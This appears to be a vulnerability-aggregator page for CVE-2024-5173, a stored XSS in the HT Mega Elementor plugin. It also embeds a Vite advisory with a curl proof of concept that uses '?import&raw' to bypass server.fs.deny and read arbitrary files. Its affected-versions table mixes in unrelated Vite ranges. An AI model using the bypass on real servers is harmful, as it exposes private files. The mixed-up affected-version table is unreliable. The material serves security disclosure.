CVE-2024-5173
published 2024-06-26CVE-2024-5173: The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Video player widget settings in all…
PriorityP423medium5.4CVSS 3.1
AVNACLPRLUIRSCCLILAN
EPSS
0.26%
17.6th percentile
The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Video player widget settings in all versions up to, and including, 2.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| devitemsllc | ht_mega_addons_for_elementor_elementor_widgets_template_builder | <= 2.5.5 | — |
| hasthemes | ht_mega | < 2.5.6 | 2.5.6 |
| vitejs | vite | >= 0 < 3.2.11 | 3.2.11 |
| vitejs | vite | >= 4.0.0 < 4.5.4 | 4.5.4 |
| vitejs | vite | >= 5.0.0 < 5.1.8 | 5.1.8 |
| vitejs | vite | >= 5.2.0 < 5.2.14 | 5.2.14 |
| vitejs | vite | >= 5.3.0 < 5.3.6 | 5.3.6 |
| vitejs | vite | >= 5.4.0 < 5.4.6 | 5.4.6 |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Vite's `server.fs.deny` is bypassed when using `?import&raw`
ghsa·2024-09-17
CVE-2024-45811 [MEDIUM] CWE-200 Vite's `server.fs.deny` is bypassed when using `?import&raw`
Vite's `server.fs.deny` is bypassed when using `?import&raw`
### Summary
The contents of arbitrary files can be returned to the browser.
### Details
`@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists.
### PoC
```sh
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev
$ echo "top secret content" > /tmp/secret.txt
# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"
403 Restricted
The request url "/tmp/secret.txt" is outside of Vite serving allow list.
# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...
```
GHSA
GHSA-982x-mjmg-rfmg: The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Video player widget settings in
ghsa_unreviewed·2024-06-26
CVE-2024-5173 [MEDIUM] CWE-79 GHSA-982x-mjmg-rfmg: The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Video player widget settings in
The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Video player widget settings in all versions up to, and including, 2.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
No detection rules found.
No public exploits indexed.
https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.5.3/includes/widgets/htmega_videoplayer.php#L549https://www.wordfence.com/threat-intel/vulnerabilities/id/aac9569e-d33d-45b3-bd03-2e7f48536ae5?source=cvehttps://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.5.3/includes/widgets/htmega_videoplayer.php#L549https://www.wordfence.com/threat-intel/vulnerabilities/id/aac9569e-d33d-45b3-bd03-2e7f48536ae5?source=cve
2024-06-26
Published